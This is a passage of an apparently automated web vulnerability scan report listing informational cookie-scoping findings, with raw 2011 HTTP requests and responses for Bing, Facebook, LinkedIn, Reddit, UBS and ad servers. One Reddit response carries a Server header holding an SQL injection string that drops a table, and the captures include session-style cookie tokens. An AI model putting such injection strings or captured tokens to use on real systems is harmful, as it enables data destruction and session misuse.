camp_freq_p1="eJzjkuGYuIxVgFGiedPSDywKjBrND/d/YDFgtADzuWQ43k5kE+CQeLwBIvt6H5A2YLfYc2sJWHbWDDag3qa1ENmm7ltgvWA+UHbuY5DJ1+8sActef7ETLAvmc4lw3F8M0vugrRcoy6DBYMBgwQAUXTEfpOdbUyuK6Jr/TAJMEs/QRHsXgExoOfv0PbLo64kg0YMPr6OITn4PMvdCw2YU0d8LQaJz0UTvvmQBis740IAiuhPosiyJT++RRUU5Zv5gEWhlllh0GlV411cWgYmMEueW/3+HLDwLaMY1RokrL/+9Qzb67AtWAWaJfU/voYh+fAV23K4LKKKzNoJEb30/iBAFAO4yhgc="; io_freq_p1="eJzjEuboCxNglGjetPQDiwGjBZjmEudYEi/AKfF4A5CjwKDBYMBusefWErDEy3ig6qa1MAlGCzAbKHEnAihx/c4SuASYzSXMcTABKPGgrRcqwWDBwCXCsS1U4CCTxLemViRRYY4fNgJMEs/QBJeB9LecffoeWfBxDFDwQsNmFMELoUDBuWiCTwOAgjM+NLxHtv5HoEArs8Si06iitwIFJjJKnFv+/x2yAZtjBJgl9j29hyJ4FGT/3F0XUAS7w4GCt74fRAgCACVJYIc="; segments_p1="eJwtUU1LAlEUJWcWr7ean9IP6Ce0r7W7Nv6GTFwkzcZokZUxWQRR6oxCH5KbxK9BclGUWkKghpHQEDSBpr1zaHM4nHvPPffdJ3XhFTSpi+0csPETUNidzCl8u4IyaEOJ94GjXkBq4jwk54UVNE4usp6uVJeeSg9oVtAxXVY0T2OZow4n4HsjcOcGfJ/KcRgRZT+gJqaCxvX/xI8xii1l1URNKKjAeHqH5icftTq3rTKzZiIzvCKlKNmakbYSvq6EbAh7D9DRMIGJLUyp0eMOwb1PYHFM5CuSHnh+Br7OjGfm7bD67UB5HyNvtqToZh/UWlT0ls5WEx0u85p0ZnmG+wyqLrOtR+CQb+yw54gblGLw+r/gKZ4nMgW/TANfO1AeHPAkL1HlfpEZVrAFtsmhuKZkKTpR3XiZRHnOPMfbHmOLwH6O16ceLwC/+LW7C/hD3szk9NEB5JSh6Bm72z6E2KqimSb+Z4rk7ob2B83Zo/U="; partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTUiOiBbIjAwNDAwMzAwMTQwMDAwMDQ0OTg3MiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXSwgIjExMyI6IFsiRlFXV0MyVksyRFdGIiwgdHJ1ZV19

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 06 Jul 2011 11:21:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 06-Jul-2011 11:21:20 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Set-Cookie: impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuG4v5hNgEniSNfFDywKjBpnZgBpA0YLMJ9LhGPiMlYBRonmTUuBsgwaDAYMFgxA0bcT2QQ4JB5vQBaV4Jg1gw2otmntUrBJTd23gCZB1M99DDLl+p0lKKasmA8S/dbUiiK65j8T0D3P0ER7F4DMbjn79D2y6OuJINGDD6+jiE5+DzL3QsNmFNHfC0Gic9FE775kAYrO+NCAIroT6LIsiU/vkUVFOWb+YBFoZZZYdBpVeNdXFoGJjBLnlv9/hyw8C2jGNUaJKy//vUM2+uwLVgFmiX1P76GIfnwFdtyuCyiiszaCRG99P4gQBQCc9nZ9"; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjkuY4mCDAJHGk6+IHFgVGjSNrr31gMWC0APO5hDn6wgQYJZo3LQVKMmgwGDBYMAAFl8QLcEo83oAq+DIeqLJpLargnQig4PU7S5AERTi2hQocZJL41tSKovSHDdAZz9AElyUA9becffoeWfBxDFDwQsNmFMELoUDBuWiCTwOAgjM+NLxHtv5HoEArs8Si06iitwIFJjJKnFv+/x2yAZtjBJgl9j29hyJ4FGT/3F0XUAS7w4GCt74fRAgCADwQWy8="; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

6.13. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=presspass%20controls&FORM=MSSBMN HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:19:45 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Date: Wed, 06 Jul 2011 11:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=E9BAB4C7FF984C72A2A7D8BEAEA22874; domain=.bing.com; path=/
Set-Cookie: MUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF%2c10716aee572d4952b36b2971f6480e26; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=MSSBMN; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=18047B6C75F646499C286F39250DB552; expires=Fri, 05-Jul-2013 11:20:45 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Content-Length: 35959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

6.14. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 148
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Wed, 06 Jul 2011 11:20:45 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1309951245; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2FDEEE3741EE47F7B94DEA42819A0D90; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=NOFORM; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=026636356BC841D79F1AE4DB11B04388; expires=Fri, 05-Jul-2013 11:20:45 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f%3fscope%3dweb%26mkt%3den-US">here</a>.</h2>
</body></html>

6.15. http://www.burstnet.com/enlightn/7111//82F1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7111//82F1/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7111//82F1/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^1AF.1GB1^15X.1F0r^16U.1F0r^186.1DzU^1As.1EWG^13V.1EXA

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Wed, 06 Jul 2011 14:00:51 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^1AF.1GB1^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EXA^13v.1EZU; path=/; expires=Fri, 06-Jul-2012 14:00:51 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

6.16. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.213.63
Connection: close
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Length: 11639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...

6.17. http://www.facebook.com/sharer/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer/sharer.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer/sharer.php?u=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php%3Fu%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fsharer%2Fsharer.php%3Fu%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.163.35
X-Cnection: close
Date: Wed, 06 Jul 2011 11:15:22 GMT
Content-Length: 0


6.18. http://www.fark.com/cgi/farkit.pl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fark.com
Path:   /cgi/farkit.pl

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi/farkit.pl HTTP/1.1
Host: www.fark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Server: Apache
P3P: CP="CAO PSA OUR"
Set-Cookie: FarkUser=v7aH50e9gtrYYySpXPTIo-nBHGZ9nVB94SwKRg1VwhFj-9-YQL5BzG0ppgaq3-8tel444UtsZSFScvB7a-XxADQaRnWCK; Domain=.fark.com; Expires=Sat, 30-Jun-2012 14:07:35 GMT; Max-Age=31104000; Path=/; Version=1; HttpOnly
Expires: Wed, 06 Jul 2011 14:07:35 GMT
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate
Content-Length: 36547

<!doctype html>
<!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ -->
<!--[if lt IE 7 ]> <html class="no-js ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-j
...[SNIP]...

6.19. http://www.google.com/bookmarks/mark

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /bookmarks/mark

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmarks/mark HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: https://www.google.com/bookmarks/mark
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1309961256:S=OFu8ed6ChCeuzoxj; expires=Fri, 05-Jul-2013 14:07:36 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 14:07:36 GMT
Server: Search-History HTTP Server
Content-Length: 234
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://www.google.com/bookmarks
...[SNIP]...

6.20. http://www.linkedin.com/shareArticle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /shareArticle

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shareArticle HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:93DIfn6pEjjvFpbrPCwqLaeaMjj-1DOra9DURRE1_gdw92SrsI2wg9:1309951282:71f9fdf64b90fac7cb9339589e3ed534ca703d1e"; Version=1; Max-Age=1799; Expires=Wed, 06-Jul-2011 11:51:21 GMT; Path=/
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:1274968938822400364"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Mon, 24-Jul-2079 14:35:29 GMT; Path=/
Set-Cookie: bcookie="v=1&96d058ca-285d-4b2d-96c8-f61d525270fc"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Mon, 24-Jul-2079 14:35:29 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 11:21:21 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a42198c;expires=Wed, 06-Jul-2011 11:53:13 GMT;path=/;httponly
Content-Length: 8493

<!DOCTYPE html>
<html lang="en">
<head>


<script type="text/jav
...[SNIP]...

6.21. http://www.newsvine.com/_tools/seed&save

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_tools/seed&save

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_tools/seed&save HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 11:20:51 GMT
Server: Apache/2.2.16 (Debian)
Set-Cookie: vid=3f48247f336bc03315b1da835fb52d70; expires=Tue, 01-Jul-2031 11:20:51 GMT; path=/; domain=.newsvine.com
Location: /_nv/accounts/login?redirect=https%3A%2F%2Fwww.newsvine.com%2F_tools%2Fseed%26save
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


6.22. http://www.reddit.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reddit.com
Path:   /submit

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /submit HTTP/1.1
Host: www.reddit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.reddit.com/login?dest=%2Fsubmit
Set-Cookie: reddit_first=%7B%22firsttime%22%3A%20%22first%22%7D; Domain=reddit.com; expires=Thu, 31 Dec 2037 23:59:59 GMT; Path=/
Server: '; DROP TABLE servertypes; --
Content-Length: 0
Date: Wed, 06 Jul 2011 13:56:58 GMT
Connection: close


6.23. http://www.tudou.com/v/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tudou.com
Path:   /v/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v/ HTTP/1.1
Host: www.tudou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: tws0.3
Date: Wed, 06 Jul 2011 14:04:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tudou=07290da15c4a46bcc3b820765334a527; path=/; domain=.tudou.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13738

357c
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" dir="ltr">
<head>
   <meta http-equ
...[SNIP]...

6.24. http://www.ubs.com/1/live/homepage/global/sprite_e.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/live/homepage/global/sprite_e.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/live/homepage/global/sprite_e.css HTTP/1.1
Host: www.ubs.com
Proxy-Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:00 GMT
Server: Apache
Set-Cookie: www-stats=130ffb66276.8526e51f; Domain=ubs.com; Path=/; Version=1; HttpOnly
Last-Modified: Thu, 17 Jun 2010 12:07:20 GMT
Cache-Control: max-age=1881
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3158

#mainNav ul.level_1 li a.mainNav1{height:28px;display:block;width:117px;background:url(/1/live/homepage/global/navsprite_e.gif) no-repeat top left}
#mainNav ul.level_1 li a.mainNav2{height:28px;displ
...[SNIP]...

6.25. http://www.ubs.com/1/live/homepage/shared/icon_arrow_right_white.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/live/homepage/shared/icon_arrow_right_white.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/live/homepage/shared/icon_arrow_right_white.gif HTTP/1.1
Host: www.ubs.com
Proxy-Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:00 GMT
Server: Apache
Set-Cookie: www-stats=130ffb662d7.8526e522; Domain=ubs.com; Path=/; Version=1; HttpOnly
Last-Modified: Thu, 17 Jun 2010 12:11:46 GMT
Cache-Control: max-age=1882
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: image/gif
Content-Length: 145

GIF89a......................................vl...............!.......,..........>0.I.U8........H..v..V.d...(cA.. ..!.`(.}.H..`.....R..rnT....&".;

6.26. http://www.ubs.com/1/live/homepage/shared/index.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/live/homepage/shared/index.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/live/homepage/shared/index.css HTTP/1.1
Host: www.ubs.com
Proxy-Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:00 GMT
Server: Apache
Set-Cookie: www-stats=130ffb6627c.8526e520; Domain=ubs.com; Path=/; Version=1; HttpOnly
Last-Modified: Thu, 12 Aug 2010 13:57:32 GMT
Cache-Control: max-age=1881
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 20437

body { background: #ffffff; padding: 21px 0 20px 0 ; margin:0; font-family:Arial,Helvetica,sans-serif;}
* {margin:0;padding:0;}
div, p, td, th, textarea, input{font-family:Arial,Helvetica,sans-seri
...[SNIP]...

6.27. http://www.ubs.com/1/live/homepage/shared/logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/live/homepage/shared/logo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/live/homepage/shared/logo.gif HTTP/1.1
Host: www.ubs.com
Proxy-Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:00 GMT
Server: Apache
Set-Cookie: www-stats=130ffb662cd.8526e521; Domain=ubs.com; Path=/; Version=1; HttpOnly
Last-Modified: Thu, 17 Jun 2010 12:11:14 GMT
Cache-Control: max-age=1881
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: image/gif
Content-Length: 2617

GIF89ad.&............................................xx'$(.QQ....bb.......KK..........AA....}}USV.::.%%...$!%..........UU.........1.1...`^a.........MKN...)&*......usu..................................
...[SNIP]...

6.28. http://www.ubs.com/1/live/homepage/shared/thickbox.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/live/homepage/shared/thickbox.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

